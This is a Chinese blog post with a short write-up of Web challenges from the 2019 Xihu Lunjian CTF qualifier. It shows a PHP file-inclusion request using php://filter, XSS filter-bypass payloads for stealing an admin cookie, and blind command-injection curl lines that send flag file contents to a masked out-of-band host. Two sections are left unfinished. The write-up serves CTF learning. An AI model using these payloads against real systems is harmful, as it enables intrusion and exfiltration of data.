---
title: 西湖论剑预选赛 Web题目解析
date: 2019-04-11
tags:
  - Web
categories: CTF
---

<font color=green>西湖论剑预选赛 Web部分题目解析</font>
<!--more-->


### <font color=dark>babyt3</font>
签到题，题目首先给出提示
```php
include $_GET['file'] 
```
在参数上加上file,则会获得下一个提示
```cmd
include $_GET['file']
<!--hint: ZGlyLnBocA== -->
```
解密后是dir.php
使用php伪协议包含获取dir.php里的内容
```cmd
http://61.164.47.198:10000/?file=php://filter/read=convert.base64-encode/resource=./dir.php

HTTP/1.1 200 OK
Date: Thu, 11 Apr 2019 08:04:12 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 149
Connection: close
Content-Type: text/html; charset=UTF-8

include $_GET['file']PD9waHAKJGEgPSBAJF9HRVRbJ2RpciddOwppZighJGEpewokYSA9ICcvdG1wJzsKfQp2YXJfZHVtcChzY2FuZGlyKCRhKSk7Cg==
<!--hint: ZGlyLnBocA== -->
```
解密
```php
<?php
$a = @$_GET['dir'];
if(!$a){
$a = '/tmp';
}
var_dump(scandir($a));

```
遍历后发现flag在根目录下，直接读取

### <font color=dark>BreakOut</font>
随便输入账号密码登陆
登陆后是一个留言界面，可以像管理员报告漏洞
```


如果你发现了该站点的bug,请将页面的URL提交给管理员,管理员会加上用户的token去登陆查验。

感谢您的配合、

```
之后执行代码界面需要管理员权限，很显然是XSS打管理员Cookie然后命令执行了
存在过滤，可以使用
```html
<img src=x onerror
=alert(1)/>
或者
<iframe src=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1);></iframe>
```
执行命令的时候采用HTTP盲注入
用ceye平台
```cmd
curl http://***/`ls /|grep flag` #找到带flag的文件
curl http://***/`cat flag`
```


### <font color=dark>猜猜flag是什么</font>
懒得写了，休息休息
### <font color=dark>？？</font>
懒得写了，休息休息




>你是我患得患失的梦，我是你可有可无的人。